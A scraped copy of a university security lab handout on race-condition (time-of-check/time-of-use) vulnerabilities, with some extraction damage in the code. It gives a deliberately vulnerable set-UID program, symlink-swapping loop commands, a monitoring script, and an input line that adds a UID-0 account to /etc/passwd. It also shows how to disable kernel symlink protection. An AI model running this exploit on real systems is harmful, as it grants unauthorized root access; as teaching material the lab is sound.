Race Condition Vulnerability Lab

Similar documents
Dirty COW Attack Lab

Linux Capability Exploration Lab

Hands-on Keyboard: Cyber Experiments for Strategists and Policy Makers

CS4264 Programming Assignment 1 Buffer Overflow Vulnerability Due 02/21/2018 at 5:00 PM EST Submit through CANVAS

Linux Operating System Environment Computadors Grau en Ciència i Enginyeria de Dades Q2

Processes are subjects.

Buffer Overflow Vulnerability Lab

Buffer Overflow Vulnerability

Buffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through to

CSC209H Lecture 1. Dan Zingaro. January 7, 2015

Operating Systems Linux 1-2 Measurements Background material

1 Lab Overview. 2 Resources Required. CSC 666 Lab #11 Buffer Overflow November 29, 2012

Lab Working with Linux Command Line

LAB #7 Linux Tutorial

Introduction to Linux. Woo-Yeong Jeong Computer Systems Laboratory Sungkyunkwan University

INTRODUCTION TO LINUX

CYSE 411/AIT681 Secure Software Engineering Topic #13. Secure Coding: Race Conditions

Lab Authentication, Authorization, and Accounting

Unix Basics. UNIX Introduction. Lecture 14

Perl and R Scripting for Biologists

Information System Audit Engr. Abdul-Rahman Mahmood MS, PMP, MCP, QMR(ISO9001:2000)

Everything about Linux User- and Filemanagement

Introduction to Linux

SQL Injection Attack Lab

INF322 Operating Systems

Users, Groups and Permission in Linux

CST8207: GNU/Linux Operating Systems I Lab Seven Linux User and Group Management. Linux User and Group Management

1 Recommended Readings

5/20/2007. Touring Essential Programs

EE516: Embedded Software Project 1. Setting Up Environment for Projects

Linux Kung Fu. Ross Ventresca UBNetDef, Fall 2017

3/7/18. Secure Coding. CYSE 411/AIT681 Secure Software Engineering. Race Conditions. Concurrency

CS246 Spring14 Programming Paradigm Notes on Linux

National University of Computer and Emerging Sciences Operating System Lab - 02 Lab Manual

CST8207: GNU/Linux Operating Systems I Lab Seven Linux User and Group Management. Linux User and Group Management

UNIT 10 Ubuntu Security

Operating Systems Security

Operating Systems Lab

UNIX. The Very 10 Short Howto for beginners. Soon-Hyung Yook. March 27, Soon-Hyung Yook UNIX March 27, / 29

Linux Capabilities & Set-UID Vulnerability

Lab E2: bypassing authentication and resetting passwords

Linux Essentials Objectives Topics:

Chapter 8: Security under Linux

Role-Based Access Control (RBAC) Lab Minix Version

Linux File System and Basic Commands

CS 642 Homework #4. Due Date: 11:59 p.m. on Tuesday, May 1, Warning!

Case Studies in Access Control

Assume that username is cse. The user s home directory will be /home/cse. You may remember what the relative pathname for users home directory is: ~

CS Fundamentals of Programming II Fall Very Basic UNIX

User Accounts. The Passwd, Group, and Shadow Files

Intro to Linux. this will open up a new terminal window for you is super convenient on the computers in the lab

A Brief Introduction to the Linux Shell for Data Science

Case Study: Access Control. Steven M. Bellovin October 4,

Introduction to Linux

Keys and Passwords. Steven M. Bellovin October 17,

5/8/2012. Encryption-based Protection. Protection based on Access Permission (Contd) File Security, Setting and Using Permissions Chapter 9

ENEE 757 Buffer Overflow Homework

The kernel is the low-level software that manages hardware, multitasks programs, etc.

Processes are subjects.

CS 2400 Laboratory Assignment #1: Exercises in Compilation and the UNIX Programming Environment (100 pts.)

Capability and System Hardening

Linux Kung-Fu. James Droste UBNetDef Fall 2016

Shellbased Wargaming

Outline. UNIX security ideas Users and groups File protection Setting temporary privileges. Examples. Permission bits Program language components

User Manual of the Pre-built Ubuntu Virtual Machine

LPI Entry Level Linux Essentials Certificate of Achievement.

CSE 565 Computer Security Fall 2018

CS/CIS 249 SP18 - Intro to Information Security

CSC 564: SQL Injection Attack Programming Project

CS 200. User IDs, Passwords, Permissions & Groups. User IDs, Passwords, Permissions & Groups. CS 200 Spring 2017

CSE 303 Lecture 4. users/groups; permissions; intro to shell scripting. read Linux Pocket Guide pp , 25-27, 61-65, , 176

CTEC1863/2018F Bonus Lab Page 1 of 5

Operating Systems. Copyleft 2005, Binnur Kurt

Overview LEARN. History of Linux Linux Architecture Linux File System Linux Access Linux Commands File Permission Editors Conclusion and Questions

Course 144 Supplementary Materials. UNIX Fundamentals

Operating Systems 3. Operating Systems. Content. What is an Operating System? What is an Operating System? Resource Abstraction and Sharing

Lab 6: OS Security for the Internet of Things

Lab 6: OS Security for the Internet of Things

Introduction to UNIX. Logging in. Basic System Architecture 10/7/10. most systems have graphical login on Linux machines

27-Sep CSCI 2132 Software Development Lab 4: Exploring bash and C Compilation. Faculty of Computer Science, Dalhousie University

Exercise Sheet 2. (Classifications of Operating Systems)

CISC 220 fall 2011, set 1: Linux basics

Chapter-3. Introduction to Unix: Fundamental Commands

Introduction to Linux

Exercise 1: Basic Tools

Buffer Overflow Vulnerability Lab

CSE 390a Lecture 4. Persistent shell settings; users/groups; permissions

Commands are in black

Oregon State University School of Electrical Engineering and Computer Science. CS 261 Recitation 1. Spring 2011

CSE 265: System and Network Administration

Secure Software Programming and Vulnerability Analysis

CST8207: GNU/Linux Operating Systems I Lab Six Linux File System Permissions. Linux File System Permissions (modes) - Part 1

Data Security and Privacy. Unix Discretionary Access Control

Introduction to Supercomputing

CENG 334 Computer Networks. Laboratory I Linux Tutorial

Lab 2: Buffer Overflows

CENG393 Computer Networks Labwork 1

Securing Unix Filesystems - When Good Permissions Go Bad

Parallel Programming Pre-Assignment. Setting up the Software Environment

Embedded System Design

Transcription:

Concordia Institute for Information Systems Engineering - INSE 6130 1 Race Condition Vulnerability Lab Copyright c 2006-2012 Wenliang Du, Syracuse University. The development of this document is funded by the National Science Foundation s Course, Curriculum, and Laboratory Improvement (CCLI) program under Award No. 0618680 and 0231122. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation. A copy of the license can be found at http://www.gnu.org/licenses/fdl.html. 1 Lab Overview The learning objective of this lab is for students to gain the first-hand experience on the race-condition vulnerability. A race condition occurs when multiple processes access and manipulate the same data concurrently, where the outcome of the execution depends on the particular order in which the access takes place. If a privileged program has a race-condition vulnerability, attackers can run a parallel process to race against the privileged program, with an intention to change the behaviors of the program. In this lab, students will be given a program with a race-condition vulnerability; their task is to develop a scheme to exploit the vulnerability and gain the root privilege. 2 Lab Tasks 2.1 A Vulnerable Program The following program is seemingly harmless. However, it contains a race-condition vulnerability. /* vulp.c */ #include <stdio.h> #include<unistd.h> #define DELAY 10000 int main() { char * fn = "/tmp/xyz"; char buffer[60]; FILE *fp; long int i; /* get user input */ scanf("%50s", buffer ); if(access(fn, W_OK)){ /* simulating delay */ for (i=0; i < DELAY; i++){ int a = iˆ2;

Concordia Institute for Information Systems Engineering - INSE 6130 2 fp = fopen(fn, "a+"); fwrite("\n", sizeof(char), 1, fp); fwrite(buffer, sizeof(char), strlen(buffer), fp); fclose(fp); else printf("no permission \n"); 2.2 Program Description & Vulnerability This is part of a Set-UID program (owned by root); it appends a string of user input to the end of a temporary file /tmp/xyz. Since the code runs with the root privilege, it carefully checks whether the real user actually has the access permission to the file /tmp/xyz; that is the purpose of the access() call. Once the program has made sure that the real user indeed has the right, the program opens the file and writes the user input into the file. It appears that the program does not have any problem at the first look. However, there is a race condition vulnerability in this program: due to the window (the simulated delay) between the check (access) and the use (fopen), there is a possibility that the file used by access is different from the file used by fopen, even though they have the same file name /tmp/xyz. If a malicious attacker can somehow make /tmp/xyz a symbolic link pointing to /etc/shadow, the attacker can cause the user input to be appended to /etc/shadow (note that the program runs with the root privilege, and can therefore overwrite any file). 2.3 Task: Exploit the Race Condition Vulnerabilities You need to exploit the race condition vulnerability in the above Set-UID program. More specifically, you need to achieve the following: Overwrite any file that belongs to root. 3 Guidelines 3.1 Two Potential Targets There are possibly many ways to exploit the race condition vulnerability in vulp.c. One way is to use the vulnerability to append some information to both /etc/passwd and /etc/shadow. These two files are used by Unix operating systems to authenticate users. If attackers can add information to these two files, they essentially have the power to create new users, including super-users (by letting uid to be zero). The /etc/passwd file is the authentication database for a Unix machine. It contains basic user attributes. This is an ASCII file that contains an entry for each user. Each entry defines the basic attributes applied to a user. When you use the mkuser command to add a user to your system, the command updates the /etc/passwd file. The file /etc/passwd has to be world readable, because many application programs need to access user attributes, such as user-names, home directories, etc. Saving an encrypted password in that file would mean that anyone with access to the machine could use password cracking programs (such as crack) to

Concordia Institute for Information Systems Engineering - INSE 6130 3 break into the accounts of others. To fix this problem, the shadow password system was created. The /etc/passwd file in the shadow system is world-readable but does not contain the encrypted passwords. Another file, /etc/shadow, which is readable only by root contains the passwords. To find out what strings to add to these two files, run mkuser, and see what are added to these files. For example, the followings are what have been added to these files after creating a new user called smith: /etc/passwd: ------------- smith:x:1000:1000:joe Smith,,,:/home/smith:/bin/bash /etc/shadow: ------------- smith:*1*srdssdsdi*m4sdabpasdsdsdasdsdasdy/:13450:0:99999:7::: The third column in the file /etc/passwd denotes the UID of the user. Because smith account is a regular user account, its value 1000 is nothing special. If we change this entry to 0, smith now becomes root. Note: In this lab, we will focus on exploting the vulnerability to append some information to the /etc/passwd. 3.2 Creating symbolic links You can manually create symbolic links using "ln -s". You can also call C function symlink to create symbolic links in your program. Since Linux does not allow one to create a link if the link already exists, we need to delete the old link first. The following C code snippet shows how to remove a link and then make /tmp/xyz point to /etc/passwd: unlink("/tmp/xyz"); symlink("/etc/passwd","/tmp/xyz"); 3.3 Improving success rate The most critical step (i.e., pointing the link to our target file) of a race-condition attack must occur within the window between check and use; namely between the access and the fopen calls in vulp.c. Since we cannot modify the vulnerable program, the only thing that we can do is to run our attacking program in parallel with the target program, hoping that the change of the link does occur within that critical window. Unfortunately, we cannot achieve the perfect timing. Therefore, the success of attack is probabilistic. The probability of successful attack might be quite low if the window are small. You need to think about how to increase the probability (Hints: you can run the vulnerable program for many times; you only need to achieve success once among all these trials). Since you need to run the attacks and the vulnerable program for many times, you need to write a program to automate the attack process. To avoid manually typing an input to vulp, you can use redirection. Namely, you type your input in a file, and then redirect this file when you run vulp. For example, you can use the following: vulp < FILE.

Concordia Institute for Information Systems Engineering - INSE 6130 4 3.4 Knowing whether the attack is successful Since the user does not have the read permission for accessing /etc/passwd, there is no way of knowing if it was modified. The only way that is possible is to see its time stamps. Also it would be better if we stop the attack once the entries are added to the respective files. The following shell script checks if the time stamps of /etc/passwd has been changed. It prints a message once the change is noticed. The following is the content of check.sh. #!/bin/sh touch attacking old= ls -l /etc/passwd new= ls -l /etc/passwd while [ "$old" = "$new" ] do new= ls -l /etc/passwd done echo "STOP... The passwd file has been changed" rm attacking 3.5 Troubleshooting While testing the program, due to untimely killing of the attack program, /tmp/xyz may get into an unstable state. When this happens the OS automatically makes it a normal file with root as its owner. If this happens, the file has to be deleted and the attack has to be restarted. 3.6 Warning In the past, some students accidentally emptied the /etc/shadow file during the attacks (we still do not know what has caused that). If you lose the shadow file, you will not be able to login again. To avoid this trouble, please make a copy of the original shadow file. 4 Procedure Note: Open the virtual machine by going into the folder SEEDUbuntu11.04 and double clicking SEE- DUbuntu11.04.vmx. All the required files are in a directory called lab on the desktop. To reach the desktop directory you can (cd /home/seed/desktop/lab). The files are input (the input of the attacker line to be fed for the vulnerable program), vulp.c (the vulnerable program) and check.sh (a bash file to check if /etc/passwd has been modified). Take a moment to see their content (using gedit). The password for sudo is dees. 1. Ubuntu 11.04 comes with an built-in protection against race condition attacks. This scheme works by restricting who can follow a symlink. In this lab, we need to disable this protection. You can achieve that using the following command: sudo sysctl -w kernel.yama.protected sticky symlinks=0. 2. In Vulp.c, modify the buffer size to fit the entry that will be appended to /etc/passwd. A buffer size of 300 characters (instead of the current 60) will be sufficient. Make sure that the following is as well changed in the source code. scanf("%300s", buffer). Compile Vulp.c using (gcc -o vulp vulp.c). Don t worry about the warnings generated because of the compilation.

Concordia Institute for Information Systems Engineering - INSE 6130 5 3. The linking/unlinking Process: Do not run the command below now. you will run it later on. sudo sh -c "while [ -e attacking ]; do ln -s /tmp/userownedfile /tmp/xyz; rm -f /tmp/xyz; ln -s /etc/passwd /tmp/xyz; rm -f /tmp/xyz ; done;" This will make /tmp/xyz point to a user owned file. Then the link will be removed so /tmp/xyz can be pointed to /etc/passwd and at last the link will be removed. This aims to loop until the attack is successful. 4. The input file: -The input file called input is already created. This will be fed to vulp.c. -The content of input should be attacker:x:0:1000:attacker,,, :/home/attacker:/bin/bash. this is correct.(using gedit). Please check if 5. Important: The idea is to exploit the time of check time of use situation that we have in vulp.c. To do that we have to run three things simultaneously. (Do this in three different terminals). In the lab directory (cd /home/seed/desktop/lab) run bash check.sh. This will loop until the attack is successful in which it will inform you that the /etc/passwd has been modified. You need to run this first. Next, is to run (In the lab directory (cd /home/seed/desktop/lab)) the linking/unlinking process from step 3. this loops until the attack is successful. Next, is to feed the input to the vulnerable program. This loops until the attack is successful. To do this, run: -sudo chown root vulp (In the lab directory (cd /home/seed/desktop/lab)). This will change the owner to root. -sudo chmod +s vulp. This will make sure the vulnerable program run as the owner of the program which is root. -sh -c "while [ -e attacking ]; do./vulp <input; done;" Good Luck

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback